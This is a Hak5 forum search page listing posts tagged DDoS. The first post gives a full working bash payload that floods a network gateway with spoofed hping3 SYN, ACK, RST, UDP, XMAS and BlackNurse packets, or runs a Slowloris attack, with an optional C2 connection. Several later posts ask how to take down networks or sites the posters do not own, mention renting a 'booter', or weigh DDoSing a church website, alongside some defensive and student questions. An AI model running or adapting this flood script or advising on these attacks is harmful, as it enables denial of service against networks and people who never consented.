Jump to content

Search the Community

Showing results for tags 'DDOS'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 16 results

  1. Flood Gateway (DDoS) This Payload was created to have a automated way to stress test a Router/Gateway at any given moment. Currently it can use SYN/ACK/RST/UDP/BlackNurse/XMAS and SlowLoris Attacks. This potentially DDoS's the connected Gateway to determine if the Router/Gateway can handle being attacked internally. (And other reasons.... 😉) The Code: #!/bin/bash # # Title: Flood Gateway (DDoS) # Author: REDD of Private-Locker # Version: 1.2 # # Description: This payload detects the Gateway IP then proceeds to # flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using # SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come) # # Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the # rest is up to you. # # Defaults to SYN Attack. # # LED SETUP (Magenta) Setting NETMODE and detecting GW IP. # LED Yellow thru Magenta Waiting Ethernet Plug connection. # LED White thru Magenta Waiting Connection to Public Website. # LED Red Blink No Gateway IP Address, waiting 15 seconds. # LED Red Solid No Gateway IP Address, exiting script. # LED Cyan Blink to Solid Connected to C2. (Optional) # LED Yellow thru Green Attacking Gateway IP with Hping3. # LED Green Solid Attack has Finished. # # NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until # connections/resources run out. # # BlackNurse Attack does NOT use the PORT Variable. It runs against the # ICMP(Ping) port. # # Type of Attack to perform. ATTACK="SYN" # Port to Attack. PORT="80" # Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes) DURATION="30" # Turn to YES if you want to connect to C2 BEFORE Attack. C2_CONNECTION="YES" ## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS) HTTP_CONNECTIONS="200" TEST_URL="http://www.google.com" # Start the Script! Man your Stations! LED SETUP; NETMODE DHCP_CLIENT; function net_connect() { while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done while ! wget $TEST_URL -qO /dev/null; do LED W SOLID; sleep .2; LED M SOLID; sleep .8; done GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}') # Detect Gateway IP, if none exit if [ -z $GATEWAY_IP ]; then i=0 for i in {1..15}; do if [ "$i" -le "15" ]; then LED R SOLID; sleep .2; LED OFF;sleep .8; else LED R SOLID; exit 0; fi done fi if [ "$C2_CONNECTION" == "YES" ]; then LED C VERYFAST; C2CONNECT; while ! pgrep cc-client; do LED C FAST;sleep 1; done LED C SOLID; sleep .5; fi } net_connect; # Prepare the Flashy Colors! function led_attack() { LED G SOLID; sleep .2; LED Y SOLID; sleep .8; } function led_attack_dur() { for (( i=1; i<=$DURATION; i++ )); do LED G SOLID; sleep .2; LED Y SOLID; sleep .8; done } # Arm the platoon! function attack() { if [ $ATTACK = "SYN" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "ACK" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "RST" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "UDP" ]; then led_attack; hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "BLACKNURSE" ]; then led_attack; hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "XMAS" ]; then led_attack; hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "SLOWLORIS" ]; then led_attack; if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then PORT="80" fi INTERVAL=$((RANDOM % 11 + 5)) i=1 while [ "$i" -le "$HTTP_CONNECTIONS" ]; do # Use Netcat to create a keep-alive connection to the Gateway IP. echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & led_attack; i=$((i + 1)); done fi LED FINISH } # Simple fix for changing arguments to CAPS arg1=$1 ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' ) # Start the Attack! CHHHAAARRRGGGEEE!! if [ "$ARG_FIX" == "ACK" ]; then ATTACK="ACK" attack; elif [ "$ARG_FIX" == "SYN" ]; then ATTACK="SYN" attack; elif [ "$ARG_FIX" == "RST" ]; then ATTACK="RST" attack; elif [ "$ARG_FIX" == "UDP" ]; then ATTACK="UDP" attack; elif [ "$ARG_FIX" == "BLACKNURSE" ]; then ATTACK="BLACKNURSE" attack; elif [ "$ARG_FIX" == "XMAS" ]; then ATTACK="XMAS" attack; elif [ "$ARG_FIX" == "SLOWLORIS" ]; then ATTACK="SLOWLORIS" attack; elif [ -z $1 ]; then # Run ATTACK Variable from beginning of Script. attack; else printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n" exit 1 fi Changelog: 1.2 - - Adds BLACKNURSE/XMAS Attacks to the payload. 1.1 - - Adds UDP/RST/Slowloris Attacks to the payload. 1.0 - Initial Release. Source Code URL: Coming Soon..
  2. I would be grateful if anyone explain to me about DDoS and DoS . The difference , tutorial(if possible) and how to defend against it. :D Tq
  3. Hi, so i louched an mdk3 after having created the blacklist file with echo and of course having placed the wlan0 in monitor mode (wlan0mon). However there is no output after: mdk3 wlan0mon d -b blacklist -c 1 I have to cancel eventually with control + c. Can somebody help? Thanks P.S using ALFA wireless card and injection works fine, tested with aireplay, also airodump, reaver etc. just MDK3 gives me issues.
  4. Hi Guys, Firstly, not sure if I'm posting in the correct place, I'm new here as you can probably tell. If it's the wrong thread, or you know where they can be posted in order to get more responses, would be great if you could help me! I'm currently doing a project for University and I'm trying to find Networking professionals who have job backgrounds (which is really becoming really hard right now) and it's due in on the 1st of April, unfortunately! I have a survey which needs filling out in regards to DDoS'ing and Internet Security within a business or organisation. I need to gather primary research and produce a case study based on the information I receive, so kinda determines my grade hugely. If you could spend around 10 minutes (max) filling in this survey: It'd be greatly appreciated! https://petelanceley.typeform.com/to/D654Se Cheers
  5. Hello, i think this is the right forum to ask for help. For over a month I have been suffering from DDoS attacks every day around 1:00 AM. I have an idea who's behind this, but I have no proof. I have a Virtual Server at CloudVPS and I have CloudFlare too. Unfortunately it was yesterday found that even cloudflare cannot offer my protection, my websites were offline again. My Hosting provider CloudVPS is not very supportive and CloudFlare recommends their Enterprise package (which costs tons of money). More or less I'm on my own. What can I actually do?
  6. Guest

    DDOS Help

    There is a networking am wanting to attack just to interrupt connection. They have a MAC Filter enable and my regular ddos attack does not go through. Is there any other method of attack that will interrupt connection to their users? Need of Help ASAP
  7. So I was watching a video the other day (DefCon Talk) and the guy mentioned a piece of software called SOCKSTRESS. What he said was that it sent packets with a value of 0 or something like that and what it did was eat up the ram on the victims machine ridiculously quick! So I wanted to know if I could put this on a linux based machine like UBUNTU or BT5. And if anyone has any information on this software I would love for you to share it because I would love to learn how to use it! Here is the download: https://defuse.ca/sockstress.htm Here is the Wiki: http://en.wikipedia.org/wiki/Sockstress
  8. Experts, My Understanding, I present myself as a newbie and approching to be a Amateur. I know a little basics of what DoS and DDoS are. And also about the negatives of performing those on others networks. My Goal, is need to perform a DoS and attack on Wireless Switch/Routers. I've my own switches which need to survive DoS attack on wireless control packets. My Need, is how to perform such attack wirelessly. I'm bit handby with Low Orbit Ion Cannon tool which I use for wired attack on packets. Here, I require to perform wirelessly and to do Protocol DoS Attck - wireless.Protocols not just, ping, arp, http. Something indepth like, DHCP, Dot1X, dot11, capwap, dtls, rrm control packets. What tools I can use, what referances I can get and what tutorial and taraings I can have. Any chat formus, where I can ping and expers and ask for advice on hacking? Basically, How to? Greatly appreciate the help!
  9. Hey guys, If anyone's aware of THC's IPV6 attack suite against the IPV6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on linux natively, the readme suggests they will not work on OS X. Are there any alternative methods for router flooding from native OS X? Thanks
  10. Hello hak5! My name is Danny and im 20 years old. I come from Denmark and at this point I'm writing my final project. My subject is "DDoS" - "How can the British authorities tackle DDoS-attacks" Therefor I have to explain how a DDoS attack actually works. Also I have to involve technical, legal and ethical issues that may arise in connection with DDoS-attacks. I hope you can help me with some of these questions. Appreciated. Regards from Kappa!
  11. Well hello there, I want to start a general discussion about DDOS attacks ( I know, we are all sick of this thematic ^^) General spoken, those attacks are illegal for 2 reasons: 1: someone needs to infect a computer with a bot; the user himself won't know he is part of this attack 2: one person decides about a site being slowed or denied So, forget about those 2 points, what I think about may sound a bit whiteknigth-like. What if someone would make a website or a tiny java applet for example, which is available free over the net. Whenever there is a rumor, protest or someone fallen in dislike (like german fashist party), you find thousands of angry people. They don't have guns , they don't have power, but they all got a smartphone (or at least a computer). How about letting them know there is actually a way to deny TV stations who work against them or shut down a website of the opposition? If all of them agree and use the site or application WHILE agree with the term of use which says the writer of the attack code is not responsible for the use of it, an angry mob with smartphones soon became a mobile DDOS envoirement..... In my understanding this would be similar to "all people visit their facebook account at one time" , which is not illegal, or do I missunderstand something? My question is: Would this concept work out && would this method still be illegal? I know that one had to explain people what they are doing and why it is important, but I never said this project would work out with no effort..... Please give me a constructive feedback about your opinion to this thematic. (PLS pardon my bad engruish :D )
  12. Hi all! I'm a student and I need to know, JUST IN THEORY, for a research, how to perform a DoS or DDoS attack. I mean, it's performed sending a large number of ping packet or clicking continously on the same link, or I don't know how many other possible ways. What are the common ways to generate a DoS attack? Can anyone help me?! Thanks
  13. tylerp


    Hello Forums im fairly new here im currently trying to learn coding and hacking and such, i have recently bought a booter or ddoser and its only 1 gb (1000mb), is that even strong enough to take out someones net for like 5 mins or take them offline for a short time, im new to all this so please dont make fun of me haha, and does anyone know a good website grabber ip thingy, thanks :D
  14. Hi, I have been a few times attacked by DDoS attacks just because I sponsor some guilds and clans with a TeamSpeak server. My current router has "Denial-of-service (DoS) attack prevention". Well this is good on paper but when a DNS DDoS attack comes as it has done, my router gets a little slow. The attacks won't kill my connection, but it more or less gets unusable. The router has a 680 MHz processor with 16 MB flash and 128 MB RAM. (Netgear WNDR3800 - N600 Wireless Dual Band Gigabit Router—Premium edition) Would a homemade router stand better against these kinds of attacks or is there a way to make the current one better against it? If a homemade router would be better, what OS / firewall should be used? I know Smoothwall has gotten a lot of good things said about it, and I know Darren has used this in one segment (back in 2010 i think). Would that still be one of the better free versions that is easy to handle or has there come up something new? Sincerely, Sleepwalker/Uyurgezer
  15. Hey guys! Just a curious question, would you consider hacking or DDOS'ing the Westboro Baptist Church's website, black hat hacking or white hat hacking? If you are not familiar, the Westboro Baptist Church is an EXTREMELY hateful little group in Topeka, Kansas. The group primarily attacks gays, and pretty much justifies everything they do through blaming gay people and America. They have protested hundreds of funerals of fallen soldiers and recently posted that they planed to attend the funerals of those who's lives were taken at the Sandy Hook tragedy (not sure if they actually went or not). I do know that "Anonymous", very recently, attacked their websites and twitter, posting the names, home adresses and phone numbers of those A**holes. What are your opinons on this? If you think its White hat hacking, what would your attack method be?
  16. Over the past few months I've noticed every 14 year old on the Internet has a booter with a CloudFlare resolver. I would like to keep my domain safe from DDOS. When I type in my domain name at www.cloudflareresolver.com however, it does show my real IP on the mail and FTP lines. I've noticed many other CloudFlare sites do not leak their IP in this way though. How do I configure it such that my IP will not be leaked? I do use the server for mail, I hope I won't have to lose that functionality.
  • Create New...